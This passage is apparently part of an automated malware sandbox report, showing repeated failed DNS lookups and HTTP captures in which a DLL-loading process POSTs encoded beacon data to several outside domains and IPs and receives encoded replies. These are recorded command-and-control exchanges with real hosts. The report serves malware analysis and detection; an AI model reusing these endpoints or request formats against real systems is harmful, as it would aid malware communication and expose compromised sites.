                                          Sep 27, 2021 20:26:56.772144079 CEST8.8.8.8192.168.2.70x23d5Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:57.551357031 CEST8.8.8.8192.168.2.70xf177Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:58.317310095 CEST8.8.8.8192.168.2.70x1cb2Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:59.100308895 CEST8.8.8.8192.168.2.70xb21fName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:59.884588957 CEST8.8.8.8192.168.2.70x829bName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:00.696050882 CEST8.8.8.8192.168.2.70x9009Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:01.475539923 CEST8.8.8.8192.168.2.70x2bd3Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:02.263926029 CEST8.8.8.8192.168.2.70x20e5Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:03.041388988 CEST8.8.8.8192.168.2.70x6be0Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:03.835410118 CEST8.8.8.8192.168.2.70xc972Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:04.610857964 CEST8.8.8.8192.168.2.70x5e5aName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:05.386045933 CEST8.8.8.8192.168.2.70xd82eName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:06.145781994 CEST8.8.8.8192.168.2.70xaa85Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:06.948333979 CEST8.8.8.8192.168.2.70x4462Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:07.711954117 CEST8.8.8.8192.168.2.70xd1bdName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:08.476635933 CEST8.8.8.8192.168.2.70x874cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:09.280138016 CEST8.8.8.8192.168.2.70xb876Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:10.087430954 CEST8.8.8.8192.168.2.70x8171Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:10.857237101 CEST8.8.8.8192.168.2.70xb8a8Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:11.631730080 CEST8.8.8.8192.168.2.70x2b76Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:12.430803061 CEST8.8.8.8192.168.2.70xf6e7Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:13.226983070 CEST8.8.8.8192.168.2.70xc17aName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:13.996356964 CEST8.8.8.8192.168.2.70xbf1cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:14.775722027 CEST8.8.8.8192.168.2.70xa512Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:15.573328972 CEST8.8.8.8192.168.2.70xa5c0Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:16.355988026 CEST8.8.8.8192.168.2.70x97ffName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:17.133666039 CEST8.8.8.8192.168.2.70x85a3Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:17.933006048 CEST8.8.8.8192.168.2.70x88e5Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:18.690586090 CEST8.8.8.8192.168.2.70xaac1Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:19.865675926 CEST8.8.8.8192.168.2.70xbc6fName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:20.679677963 CEST8.8.8.8192.168.2.70xaab9Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:21.478529930 CEST8.8.8.8192.168.2.70x2098Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:22.242212057 CEST8.8.8.8192.168.2.70xbcbbName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:23.040184975 CEST8.8.8.8192.168.2.70x5f23Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:23.810910940 CEST8.8.8.8192.168.2.70xcd2aName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:24.605662107 CEST8.8.8.8192.168.2.70xdd12Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:25.397234917 CEST8.8.8.8192.168.2.70x16d4Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:26.651721001 CEST8.8.8.8192.168.2.70xd6e4Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:28.377547979 CEST8.8.8.8192.168.2.70x4f05Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:29.148997068 CEST8.8.8.8192.168.2.70x4806Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:29.947721004 CEST8.8.8.8192.168.2.70x493eName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:30.757169962 CEST8.8.8.8192.168.2.70x8e55Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:31.544518948 CEST8.8.8.8192.168.2.70x509Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:32.305871964 CEST8.8.8.8192.168.2.70x1e02Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:33.108398914 CEST8.8.8.8192.168.2.70x8a56Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:33.922348976 CEST8.8.8.8192.168.2.70x67fcName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:34.697350979 CEST8.8.8.8192.168.2.70x958cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:35.480268002 CEST8.8.8.8192.168.2.70x4b1aName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:37.276654959 CEST8.8.8.8192.168.2.70xb448Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:38.043040991 CEST8.8.8.8192.168.2.70x3aadName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:38.822201967 CEST8.8.8.8192.168.2.70x834cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:39.621783972 CEST8.8.8.8192.168.2.70xc895Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:40.682873011 CEST8.8.8.8192.168.2.70x17Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:41.443505049 CEST8.8.8.8192.168.2.70x6290Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:42.583395004 CEST8.8.8.8192.168.2.70xcab3Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:43.385703087 CEST8.8.8.8192.168.2.70xfa04Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:44.257919073 CEST8.8.8.8192.168.2.70xf4b3Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:47.095489979 CEST8.8.8.8192.168.2.70xf868Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:47.902513027 CEST8.8.8.8192.168.2.70x63f5Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:48.684627056 CEST8.8.8.8192.168.2.70x4b69Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • hoteloaktree.com
                                          • sirifinco.com
                                          • mohsinkhanfoundation.com
                                          • lendbiz.vn

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.749746185.67.1.9480C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:46.195082903 CEST985OUTPOST /QthLWsZsVgb/OQsaDixzHTgtfjMcGypGenN5Yn59cmV+YXw= HTTP/1.1
                                          Host: hoteloaktree.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.749747162.215.253.1480C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:46.823128939 CEST987OUTPOST /Urbhq9wO50j/ASk5Kx0SPR8lJjE5eTg9GkN6dX1le310YXlkfA== HTTP/1.1
                                          Host: sirifinco.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:46.965917110 CEST988INHTTP/1.1 406 Not Acceptable
                                          Date: Mon, 27 Sep 2021 18:25:46 GMT
                                          Server: Apache
                                          Content-Length: 226
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 6f 74 20 41 63 63 65 70 74 61 62 6c 65 21 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 41 63 63 65 70 74 61 62 6c 65 21 3c 2f 68 31 3e 3c 70 3e 41 6e 20 61 70 70 72 6f 70 72 69 61 74 65 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 54 68 69 73 20 65 72 72 6f 72 20 77 61 73 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 4d 6f 64 5f 53 65 63 75 72 69 74 79 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                          Data Ascii: <head><title>Not Acceptable!</title></head><body><h1>Not Acceptable!</h1><p>An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          10192.168.2.749770107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:54.234761000 CEST1356OUTPOST /pcQLeLMbur/EgwSFkZ6c3lifn1yZX5hfA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:54.640748024 CEST1358INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:54 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 65 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+eEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          11192.168.2.749772107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:54.981651068 CEST1366OUTPOST /pcQLeLMbur/CXwgNgIIIXMeeQkPPhYCOUN6dX1le310YXlkfA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:55.383945942 CEST1367INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:55 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 65 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+eUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          12192.168.2.749774107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:55.893393993 CEST1376OUTPOST /pcQLeLMbur/fSkCegETcg8VKw95Qn12eWR6endleGV7 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:56.286302090 CEST1377INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:55 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 65 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+ekJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          13192.168.2.749776107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:56.568809986 CEST1378OUTPOST /pcQLeLMbur/ITIYRX5yeGV9eXNkeWJ4 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:56.965070963 CEST1378INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:56 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 65 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+ekJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          14192.168.2.749777107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:57.253578901 CEST1380OUTPOST /pcQLeLMbur/OhpCfXZ5ZHp6d2V4ZXs= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:57.677479982 CEST1386INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:57 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 65 30 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+e0JBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          15192.168.2.749778107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:58.020242929 CEST1399OUTPOST /pcQLeLMbur/DCwZNSYnBRJFfnJ4ZX15c2R5Yng= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
